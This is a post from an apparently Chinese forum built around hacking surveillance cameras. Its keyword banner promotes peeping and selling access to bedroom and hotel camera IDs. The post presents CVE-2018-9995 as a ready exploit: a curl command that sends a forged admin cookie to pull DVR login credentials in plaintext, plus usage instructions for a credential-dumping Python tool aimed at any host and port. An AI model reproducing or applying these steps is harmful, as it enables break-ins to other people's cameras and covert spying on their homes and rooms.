摄像头破解,摄像头破解教程,摄像头偷窥,摄像头扫描破解,黑瞳,云视通破解,摄像头漏洞,摄像头破解教程,云视通ID出售、云视通扫描工具,云视通卧室ID,云视通ID大全,摄像头宾馆,易视眼、360小水滴、ipcam、wificam

 找回密码
 立即注册
搜索
查看: 1403|回复: 0

DVR登录验证的摄像头漏洞

[复制链接]

306

主题

345

帖子

849

积分

超级版主

Rank: 8Rank: 8

积分
849
发表于 2021-5-3 20:17:24 | 显示全部楼层 |阅读模式
本帖最后由 CAM 于 2021-5-3 20:28 编辑

前言
昨天看了一个群发出来的视频,是说通过漏洞破解摄像头后台管理的,然后我就看到了是CVE-2018-9995这个漏洞。嗯 这漏洞是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我拿来复现试了一下,是可以的!




漏洞编号:CVE-2018-9995

发现时间:2018-4

影响范围:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL

漏洞描述:   DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。   最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。  

最开始研究员发现CVE-2018-9995仅影响由TBK制造的DVR设备,但接下来发现,由其他供应商的产品同样受到影响,包括但不限于:Novo、cenova、qseepulnix、night owl。




利用:
$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"



在ZOOM:





下面是干货:

前提是要有git、python、pip install 'tableprint'、em就这么多


cd CVE-2018-9995_dvr_credentials

pip install -r requirements

help

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining Exposed credentialsoptional arguments:  
-h, --help     show this help message and exit  
-v, --version  show program's version number and exit  
--host HOST    Host  
--port PORT    Port


[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 --p 81

重点就是demo

host就是ip地址
p就是端口


接下来就是复现  
在浏览器那里还需要装个插件才可以开启预览






工具安装及配置附件下载工具安装及配置附件下载
工具安装及配置附件下载








本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|摄像头漏洞安全论坛 ( 本站仅服务北美,日本和台湾地区,其他地区用户考虑使用法律风险。 )

GMT+8, 2021-12-2 23:21 , Processed in 0.404625 second(s), 20 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表